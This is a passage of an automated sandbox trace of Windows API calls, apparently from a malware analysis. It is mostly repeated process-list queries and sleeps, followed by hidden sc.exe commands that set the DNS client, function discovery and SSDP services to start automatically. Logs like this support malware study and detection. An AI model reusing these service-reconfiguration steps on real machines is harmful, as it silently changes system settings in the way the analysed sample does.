ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xdf88) returned 0x0 [0246.482] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0249.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xde08) returned 0x0 [0249.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xde08) returned 0x0 [0249.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xde08) returned 0x0 [0249.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xde08) returned 0x0 [0249.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xde08) returned 0x0 [0249.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xde08) returned 0x0 [0249.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xde08) returned 0x0 [0249.222] SleepEx (dwMilliseconds=0x5, bAlertable=0) returned 0x0 [0249.287] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0251.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xcac8) returned 0x0 Thread: id = 81 os_tid = 0x984 [0080.433] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0082.528] EtwEventRegister () returned 0x0 [0083.273] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.273] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x378, hWritePipe=0x560f110*=0x37c) returned 1 [0083.273] GetCurrentProcess () returned 0xffffffff [0083.273] GetCurrentProcess () returned 0xffffffff [0083.273] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x378, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x380) returned 1 [0083.273] CloseHandle (hObject=0x378) returned 1 [0083.273] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.273] CoTaskMemAlloc (cb=0x20e) returned 0x72e520 [0083.273] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.273] CoTaskMemFree (pv=0x72e520) [0083.274] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config Dnscache start= auto", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f054*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24c3d34 | out: lpCommandLine="\"sc.exe\" config Dnscache start= auto", lpProcessInformation=0x24c3d34*(hProcess=0x388, hThread=0x384, dwProcessId=0xa88, dwThreadId=0xb78)) returned 1 [0083.288] CloseHandle (hObject=0x37c) returned 1 [0083.288] GetFileType (hFile=0x380) returned 0x3 [0083.288] CloseHandle (hObject=0x384) returned 1 [0083.288] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.288] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0083.289] GetCurrentProcess () returned 0xffffffff [0083.289] GetCurrentProcess () returned 0xffffffff [0083.289] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x390) returned 1 [0083.289] CloseHandle (hObject=0x384) returned 1 [0083.289] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.289] CoTaskMemAlloc (cb=0x20e) returned 0x72e520 [0083.289] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.289] CoTaskMemFree (pv=0x72e520) [0083.289] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config FDResPub start= auto", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f054*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24c782c | out: lpCommandLine="\"sc.exe\" config FDResPub start= auto", lpProcessInformation=0x24c782c*(hProcess=0x38c, hThread=0x384, dwProcessId=0xba8, dwThreadId=0xbb4)) returned 1 [0083.294] CloseHandle (hObject=0x37c) returned 1 [0083.294] GetFileType (hFile=0x390) returned 0x3 [0083.294] CloseHandle (hObject=0x384) returned 1 [0083.294] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.294] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0083.294] GetCurrentProcess () returned 0xffffffff [0083.294] GetCurrentProcess () returned 0xffffffff [0083.294] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x398) returned 1 [0083.294] CloseHandle (hObject=0x384) returned 1 [0083.294] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.294] CoTaskMemAlloc (cb=0x20e) returned 0x72e520 [0083.294] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.295] CoTaskMemFree (pv=0x72e520) [0083.295] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SSDPSRV start= auto", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, 